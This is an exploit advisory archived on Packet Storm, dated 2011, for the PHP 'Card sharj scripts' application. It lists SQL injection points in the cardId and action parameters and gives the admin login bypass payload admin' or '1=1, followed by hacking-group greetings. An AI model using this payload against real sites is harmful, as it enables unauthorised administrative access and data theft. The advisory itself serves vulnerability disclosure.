Card Sharj suffers from a remote SQL injection vulnerability that allows for authentication bypass.
00174e0df37ba26c5e7d8098d60774ad35617d9cb21acffa02a1b7e1e94afc46__________.__ __ ___ ___
\______ \ | _____ ____ | | __ / | \ ____
| | _/ | \__ \ _/ ___\| |/ / ______ / ~ \/ ___\
| | \ |__/ __ \\ \___| < /_____/ \ Y / /_/ >
|______ /____(____ /\___ >__|_ \ \___|_ /\___ /
\/ \/ \/ \/ \//_____/
.ORG
[+] Info=================================================================
[-] Exploit Title: Card sharj scripts Auth Bypass & Sqli Vulnerability
[-] Author: Net.Edit0r
[-] Home : Black-HG.Org
[-] Version: 1.01
[-] Software Link: http://dl.xn--mgbguh09aqiwi.com/files/Card-sharj-scripts.rar
[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net
[-] Date : 2011 / 09 / 16
[-] CVE : N/A
[-] Tnx2 : A.Cr0x & 3H34N & 4m!n & Cyrus & tHe.k!ll3r & Mr.XHat & Mikili
[+] Exploit===============================================================
http://127.0.0.1/index.php?cardId=[sql inject]
http://127.0.0.1/index.php?action=[sql inject]
http://localhost/Card-sharj-scripts/admin/index.php
Username & Password: admin' or '1=1
[+] Greets===================================================================+
+
Ter0R ~ Hurr!c4nE ~ Cru3l.b0y ~ M4hd1 ~ NoL1m1t ~ s3cure.p0rt ,r3v0lter +
+
Skitt3r ~ cmaxx ~ SkilleR ~ p0w3rfu7 And All #BHG Members +
+
h4ckcity.org , pentesters.ir, mn-team.net [PersianGulf F0r Ever] +
+
<3 I Love You iRAN Far==>D <3 +
+
=============================================================================+
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed